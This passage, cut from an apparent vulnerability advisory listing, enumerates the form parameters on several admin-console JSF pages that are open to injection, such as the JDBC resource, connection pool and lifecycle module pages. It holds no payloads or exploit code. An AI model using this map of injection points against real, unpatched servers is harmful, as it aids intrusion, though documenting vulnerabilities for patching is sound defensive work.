propertyForm:propertySheet:generalPropertySheet:jndiProp:Jndi or (14) propertyForm:propertySheet:generalPropertySheet:descProp:cd parameter to (d) resourceNode/jmsConnectionNew.jsf; the (15) propertyForm:propertySheet:propertSectionTextField:jndiProp:jnditext or (16) propertyForm:propertySheet:propertSectionTextField:descProp:desc parameter to (e) resourceNode/jdbcResourceNew.jsf; the (17) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:nameProp:name, (18) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:classNameProp:classname, or (19) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:loadOrderProp:loadOrder parameter to (f) applications/lifecycleModulesNew.jsf; or the (20) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:jndiProp:name, (21) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:resTypeProp:resType, or (22) propertyForm:propertyContentPage:propertySheet:generalPropertySheet:dbProp:db parameter to (g) resourceNode/jdbcConnectionPoolNew1.jsf. 38  Page :

Total number of vulnerabilities :Page : 1 (This Page)

Written by Jane